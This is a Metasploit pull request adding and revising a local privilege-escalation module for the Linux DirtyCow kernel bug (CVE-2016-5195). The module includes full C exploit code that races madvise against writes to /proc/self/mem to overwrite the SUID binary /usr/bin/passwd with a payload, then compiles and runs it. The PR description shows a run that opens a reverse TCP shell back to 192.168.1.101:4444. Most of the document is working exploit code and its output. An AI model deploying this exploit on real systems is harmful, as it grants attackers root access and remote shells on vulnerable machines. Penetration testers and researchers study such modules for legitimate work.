### PR TITLE
CVE-2016-5195 - DirtyCow privilege escalation

### DIFF
--- a/modules/exploits/linux/local/dirtycow.rb
+++ b/modules/exploits/linux/local/dirtycow.rb
@@ -34,6 +34,7 @@ class MetasploitModule < Msf::Exploit::Local
         [
           ['CVE', '2016-5195'],
           ['URL', 'https://dirtycow.ninja/'],
+          ['URL', 'https://github.com/dirtycow/dirtycow.github.io/issues/25'],
           ['URL', 'https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails'],
           ['URL', 'https://access.redhat.com/security/cve/cve-2016-5195'],
           ['URL', 'https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619']

--- a/modules/exploits/linux/local/dirtycow.rb
+++ b/modules/exploits/linux/local/dirtycow.rb
@@ -55,14 +55,13 @@ class MetasploitModule < Msf::Exploit::Local
   def check
     kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))
     if kernel >= Gem::Version.new('2.6.22')
-      return CheckCode::Appears
+      CheckCode::Appears
     else
-      return CheckCode::Safe
+      CheckCode::Safe
     end
   end
 
   def exploit
-
     if check != CheckCode::Appears
       fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
     end

--- a/modules/exploits/linux/local/dirtycow.rb
+++ b/modules/exploits/linux/local/dirtycow.rb
@@ -26,6 +26,7 @@ class MetasploitModule < Msf::Exploit::Local
       'License' => MSF_LICENSE,
       'Author' => [
         'Phil Oester', # Vulnerability Discovery
+        'Robin Verton', # cowroot.c developer
         'Nixawk' # original module developer
       ],
       'Platform' => [ 'linux' ],

--- a/modules/exploits/linux/local/dirtycow.rb
+++ b/modules/exploits/linux/local/dirtycow.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = GreatRanking
 
@@ -176,9 +174,6 @@ int main(int argc, char *argv[]) {
 
     output = cmd_exec("/usr/bin/gcc -pthread -o #{evil_path}.out #{evil_path}.c")
     output.each_line { |line| vprint_status(line.chomp) }
-
-    print_status('Starting the payload handler...')
-    handler({})
 
     print_status("Executing at #{Time.now}.")
     output = cmd_exec("chmod +x #{evil_path}.out; #{evil_path}.out")

--- a/modules/exploits/linux/local/dirtycow.rb
+++ b/modules/exploits/linux/local/dirtycow.rb
@@ -38,13 +38,18 @@ class MetasploitModule < Msf::Exploit::Local
           ['URL', 'https://access.redhat.com/security/cve/cve-2016-5195'],
           ['URL', 'https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619']
         ],
-       'Targets' =>
-         [
-           [ 'Linux x86', { 'Arch' => ARCH_X86 }],
-           [ 'Linux x64', { 'Arch' => ARCH_X86_64 }]
-         ],
-        'DefaultTarget' => 0,
-        'DisclosureDate' => 'Oct 19 2016'
+      'Targets' =>
+        [
+          [ 'Linux x86', { 'Arch' => ARCH_X86 }],
+          [ 'Linux x64', { 'Arch' => ARCH_X86_64 }]
+        ],
+      'DefaultOptions' =>
+        {
+          'PrependSetresuid' => true,
+          'PrependSetuid'    => true
+        },
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Oct 19 2016'
     }))
 
     register_options([

--- a/modules/exploits/linux/local/dirtycow.rb
+++ b/modules/exploits/linux/local/dirtycow.rb
@@ -26,6 +26,7 @@ class MetasploitModule < Msf::Exploit::Local
         read-only memory mappings. An unprivileged local user could use
         this flaw to gain write access to otherwise read-only memory mappings
         and thus increase their privileges on the system.
+        The bug has existed since around Linux Kernel 2.6.22 (released in 2007).
       },
       'License' => MSF_LICENSE,
       'Author' => [
@@ -57,7 +58,21 @@ class MetasploitModule < Msf::Exploit::Local
     ])
   end
 
+  def check
+    kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))
+    if kernel >= Gem::Version.new('2.6.22')
+      return CheckCode::Appears
+    else
+      return CheckCode::Safe
+    end
+  end
+
   def exploit
+
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+    end
+
     main = %q^
 #include <stdio.h>
 #include <stdlib.h>

--- a/modules/exploits/linux/local/dirtycow.rb
+++ b/modules/exploits/linux/local/dirtycow.rb
@@ -169,7 +169,7 @@ int main(int argc, char *argv[]) {
     print_status('Starting the payload handler...')
     handler({})
 
-    print_status("Executing at #{Time.now}.  May take up to 10min for callback")
+    print_status("Executing at #{Time.now}.")
     output = cmd_exec("chmod +x #{evil_path}.out; #{evil_path}.out")
     output.each_line { |line| vprint_status(line.chomp) }
 

--- a/modules/exploits/linux/local/dirtycow.rb
+++ b/modules/exploits/linux/local/dirtycow.rb
@@ -4,10 +4,6 @@
 ##
 
 require 'msf/core'
-require 'rex'
-require 'msf/core/exploit/local/linux_kernel'
-require 'msf/core/exploit/local/linux'
-require 'msf/core/exploit/exe'
 
 class MetasploitModule < Msf::Exploit::Local
   Rank = GreatRanking
@@ -15,7 +11,6 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::EXE
   include Msf::Post::File
   include Msf::Exploit::FileDropper
-  include Msf::Exploit::Local::Linux
 
   def initialize(info={})
     super(update_info(info, {

--- a/modules/exploits/linux/local/dirtycow.rb
+++ b/modules/exploits/linux/local/dirtycow.rb
@@ -66,6 +66,10 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 
+  def on_new_session(client)
+    client.shell_command_token('echo 0 > /proc/sys/vm/dirty_writeback_centisecs')
+  end
+
   def exploit
     if check != CheckCode::Appears
       fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')

--- a/modules/exploits/linux/local/dirtycow.rb
+++ b/modules/exploits/linux/local/dirtycow.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Local
-  Rank = GreatRanking
+  Rank = ManualRanking
 
   include Msf::Exploit::EXE
   include Msf::Post::File

--- a/modules/exploits/linux/local/dirtycow.rb
+++ b/modules/exploits/linux/local/dirtycow.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def initialize(info={})
     super(update_info(info, {
-      'Name' => 'Linux Kernel DirtyCow Local Privilege Escation',
+      'Name' => 'Linux Kernel DirtyCow Local Privilege Escalation',
       'Description' => %q{
         A race condition was found in the way the Linux kernel's memory
         subsystem handled the copy-on-write (COW) breakage of private

--- a/modules/exploits/linux/local/dirtycow.rb
+++ b/modules/exploits/linux/local/dirtycow.rb
@@ -173,7 +173,7 @@ int main(int argc, char *argv[]) {
     output = cmd_exec("chmod +x #{evil_path}.out; #{evil_path}.out")
     output.each_line { |line| vprint_status(line.chomp) }
 
-    register_file_for_cleanup(evil_path)
+    register_file_for_cleanup("#{evil_path}.c")
     register_file_for_cleanup("#{evil_path}.out")
   end
 end

--- a/modules/exploits/linux/local/dirtycow.rb
+++ b/modules/exploits/linux/local/dirtycow.rb
@@ -28,7 +28,10 @@ class MetasploitModule < Msf::Exploit::Local
         and thus increase their privileges on the system.
       },
       'License' => MSF_LICENSE,
-      'Author' => [ 'Nixawk' ],
+      'Author' => [
+        'Phil Oester', # Vulnerability Discovery
+        'Nixawk' # original module developer
+      ],
       'Platform' => [ 'linux' ],
       'Arch' => [ ARCH_X86, ARCH_X64 ],
       'SessionTypes' => ['shell', 'meterpreter'],
@@ -46,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Local
            [ 'Linux x64', { 'Arch' => ARCH_X86_64 }]
          ],
         'DefaultTarget' => 0,
-        'DisclosureDate' => 'Oct 19 1026'
+        'DisclosureDate' => 'Oct 19 2016'
     }))
 
     register_options([

--- a/modules/exploits/linux/local/dirtycow.rb
+++ b/modules/exploits/linux/local/dirtycow.rb
@@ -1,0 +1,176 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/local/linux_kernel'
+require 'msf/core/exploit/local/linux'
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GreatRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Local::Linux
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name' => 'Linux Kernel DirtyCow Local Privilege Escation',
+      'Description' => %q{
+        A race condition was found in the way the Linux kernel's memory
+        subsystem handled the copy-on-write (COW) breakage of private
+        read-only memory mappings. An unprivileged local user could use
+        this flaw to gain write access to otherwise read-only memory mappings
+        and thus increase their privileges on the system.
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [ 'Nixawk' ],
+      'Platform' => [ 'linux' ],
+      'Arch' => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes' => ['shell', 'meterpreter'],
+      'References' =>
+        [
+          ['CVE', '2016-5195'],
+          ['URL', 'https://dirtycow.ninja/'],
+          ['URL', 'https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails'],
+          ['URL', 'https://access.redhat.com/security/cve/cve-2016-5195'],
+          ['URL', 'https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619']
+        ],
+       'Targets' =>
+         [
+           [ 'Linux x86', { 'Arch' => ARCH_X86 }],
+           [ 'Linux x64', { 'Arch' => ARCH_X86_64 }]
+         ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Oct 19 1026'
+    }))
+
+    register_options([
+      OptString.new("WritableDir", [ true, "A directory where we can write files (must not be mounted noexec)", "/tmp" ])
+    ])
+  end
+
+  def exploit
+    main = %q^
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <string.h>
+#include <unistd.h>
+
+void *map;
+int f;
+int stop = 0;
+struct stat st;
+char *name;
+pthread_t pth1, pth2, pth3;
+
+char suid_binary[] = "/usr/bin/passwd";
+
+SHELLCODE
+
+unsigned int shellcode_size = 0;
+
+
+void *madviseThread(void *arg)
+{
+  char *str;
+  str=(char*)arg;
+  int i, c=0;
+  for(i=0; i<1000000 && !stop; i++) {
+    c += madvise(map,100,MADV_DONTNEED);
+  }
+  printf("thread stopped\n");
+}
+
+void *procselfmemThread(void *arg)
+{
+  char *str;
+  str = (char*)arg;
+  int f=open("/proc/self/mem",O_RDWR);
+  int i, c=0;
+  for(i=0; i<1000000 && !stop; i++) {
+    lseek(f, map, SEEK_SET);
+    c += write(f, str, shellcode_size);
+  }
+  printf("thread stopped\n");
+}
+
+void *waitForWrite(void *arg) {
+  char buf[shellcode_size];
+
+  for(;;) {
+    FILE *fp = fopen(suid_binary, "rb");
+
+    fread(buf, shellcode_size, 1, fp);
+
+    if(memcmp(buf, shellcode, shellcode_size) == 0) {
+      printf("%s overwritten\n", suid_binary);
+      break;
+    }
+
+    fclose(fp);
+    sleep(1);
+  }
+
+  stop = 1;
+  system(suid_binary);
+}
+
+int main(int argc, char *argv[]) {
+  char *backup;
+
+  asprintf(&backup, "cp %s /tmp/bak", suid_binary);
+  system(backup);
+
+  f = open(suid_binary,O_RDONLY);
+  fstat(f,&st);
+
+  char payload[st.st_size];
+  memset(payload, 0x90, st.st_size);
+  memcpy(payload, shellcode, shellcode_size+1);
+
+  map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
+
+  pthread_create(&pth1, NULL, &madviseThread, suid_binary);
+  pthread_create(&pth2, NULL, &procselfmemThread, payload);
+  pthread_create(&pth3, NULL, &waitForWrite, NULL);
+
+  pthread_join(pth3, NULL);
+
+  return 0;
+}
+^
+    payload_file = generate_payload_exe
+    main.gsub!(/SHELLCODE/) do
+      # Split the payload into chunks and dump it out as a hex-escaped
+      # literal C string.
+      Rex::Text.to_c(payload_file, 64, "shellcode")
+    end
+    main.gsub!(/shellcode_size = 0/, "shellcode_size = #{payload_file.length}")
+
+    evil_path = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(10)}"
+
+    write_file("#{evil_path}.c", main)
+    print_status("Compiling #{evil_path}.c via gcc")
+
+    output = cmd_exec("/usr/bin/gcc -pthread -o #{evil_path}.out #{evil_path}.c")
+    output.each_line { |line| vprint_status(line.chomp) }
+
+    print_status('Starting the payload handler...')
+    handler({})
+
+    print_status("Executing at #{Time.now}.  May take up to 10min for callback")
+    output = cmd_exec("chmod +x #{evil_path}.out; #{evil_path}.out")
+    output.each_line { |line| vprint_status(line.chomp) }
+
+    register_file_for_cleanup(evil_path)
+    register_file_for_cleanup("#{evil_path}.out")
+  end
+end


### PR DESCRIPTION
Tell us what this change does. If you're fixing a bug, please mention
the github issue number.
## Verification

List the steps needed to make sure this thing works
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/local/dirtycow`
- [ ] `set SESSION 1`
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not

```
msf exploit(dirtycow) > show options

Module options (exploit/linux/local/dirtycow):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION      6                yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)


Payload options (linux/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.101    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux x64


msf exploit(dirtycow) > set SESSION 7
SESSION => 7
msf exploit(dirtycow) > run

[*] Started reverse TCP handler on 192.168.1.101:4444
[*] Compiling /tmp/QSjHhucDLS.c via gcc
[*] Starting the payload handler...
[*] Executing at 2016-10-22 07:50:28 -0500.  May take up to 10min for callback
[*] Command shell session 8 opened (192.168.1.101:4444 -> 192.168.1.100:46051) at 2016-10-22 07:50:29 -0500

```
